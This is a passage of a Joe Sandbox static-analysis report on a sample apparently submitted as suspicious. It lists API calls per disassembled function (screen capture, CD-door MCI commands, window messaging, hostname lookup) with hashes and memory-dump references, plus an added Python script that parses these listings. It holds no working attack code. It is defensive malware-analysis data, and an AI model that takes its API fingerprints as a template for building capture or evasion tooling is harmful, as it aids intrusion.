• Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
• Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
• SendMessageW.USER32 ref: 00471740
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
• ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
• ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
• SendMessageW.USER32 ref: 0047184F
• SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
• SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
• String ID:
• API String ID: 4116747274-0
• Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
• Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00461678
• _wcslen.LIBCMT ref: 00461683
• __swprintf.LIBCMT ref: 00461721
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
• GetClassNameW.USER32(?,?,00000400), ref: 00461811
• GetDlgCtrlID.USER32(?), ref: 00461869
• GetWindowRect.USER32(?,?), ref: 004618A4
• GetParent.USER32(?), ref: 004618C3
• ScreenToClient.USER32(00000000), ref: 004618CA
• GetClassNameW.USER32(?,?,00000100), ref: 00461941
• GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
• Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
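Every "APIs" listing in this report uses one line format: an optional "Part of subcall function XXXXXXXX:" prefix, then API.MODULE, an optional parenthesised argument list in which "?" marks a value the static analysis could not recover, and "ref:" with the call site address. The script below is an added example and is not part of the Joe Sandbox report or of the Joe Sandbox product. It parses two listings copied verbatim from this report (the string-table/MessageBoxW routine at 004608A9 and the GetMenuItemInfoW/Sleep routine at 0045FDDB) into records, decodes the Sleep() delay from its hex argument, and re-derives the report's "API ID" string. The token-splitting rule and the stop-token set (Get/Set verbs, the W/A/Ex suffixes, "Box") are assumptions inferred from the IDs printed on this page, not a documented Joe Sandbox algorithm: they reproduce the IDs of these two routines, but not necessarily of others (the icon routine's ID keeps "ImageList_" as one token, which this tokenizer would split).

```python
import re
from collections import Counter

# Two "APIs" listings copied verbatim from this report's disassembly summaries.
ERROR_BOX_LISTING = """\
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
"""

MENU_SLEEP_LISTING = """\
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
• Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
"""

# One report line: [subcall prefix] API.MODULE[(args)], ref: ADDRESS
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_listing(text):
    """Turn one 'APIs' listing into call records.
    Unrecovered arguments ('?') become None; every other argument is hex."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings and anything not in the call format are skipped
        raw = m.group("args")
        args = [] if not raw else [None if a == "?" else int(a, 16) for a in raw.split(",")]
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return records


# CamelCase words, or a leading-underscore CRT name such as __swprintf / _wcslen.
TOKEN_RE = re.compile(r"_+[a-z0-9]+|[A-Z][a-z0-9]*")
# Assumption: the report's own API IDs visibly omit these tokens. The real
# stop list used by Joe Sandbox is not documented on this page.
STOP_TOKENS = {"Get", "Set", "W", "A", "Ex", "Box"}


def api_id(records):
    """Approximate the report's 'API ID': tokenize each API name, drop stop
    tokens, group tokens by how often they occur (most frequent tier first,
    tiers joined with '$') and sort each tier in ASCII order."""
    counts = Counter()
    for r in records:
        for tok in TOKEN_RE.findall(r["api"]):
            if tok not in STOP_TOKENS:
                counts[tok] += 1
    tiers = {}
    for tok, n in counts.items():
        tiers.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(tiers[n])) for n in sorted(tiers, reverse=True))


def sleep_delays_ms(records):
    """Decode the first argument of every Sleep() call (milliseconds)."""
    return [r["args"][0] for r in records if r["api"] == "Sleep" and r["args"]]


if __name__ == "__main__":
    for listing in (ERROR_BOX_LISTING, MENU_SLEEP_LISTING):
        recs = parse_listing(listing)
        print(api_id(recs), [f"{r['api']}@{r['ref']:08X}" for r in recs])
    print(sleep_delays_ms(parse_listing(MENU_SLEEP_LISTING)))  # [500]
```

Feeding the whole "APIs" section of a report through parse_listing gives a per-function call table keyed by ref address, which is easier to diff against other samples or to cross-check against the behaviour signatures than the rendered page.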
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
• Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: InfoItemMenu$Sleep
• String ID: 0
• API String ID: 1196289194-4108050209
• Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
• Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
• Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                                                                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                • API String ID: 1976180769-4113822522
                                                                                                                                                                                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 461458858-0
                                                                                                                                                                                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3969911579-0
• Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
• Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
• Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
• Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
• String ID: 0
• API String ID: 956284711-4108050209
• Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
• Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 1965227024-3771769585
• Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
• Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
• Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
• Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: SendString$_memmove_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 369157077-1007645807
• Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
• Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
APIs
• GetParent.USER32 ref: 00445BF8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
• __wcsicoll.LIBCMT ref: 00445C33
• __wcsicoll.LIBCMT ref: 00445C4F
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
• Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1350042424-0
                                                                                                                                                                                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
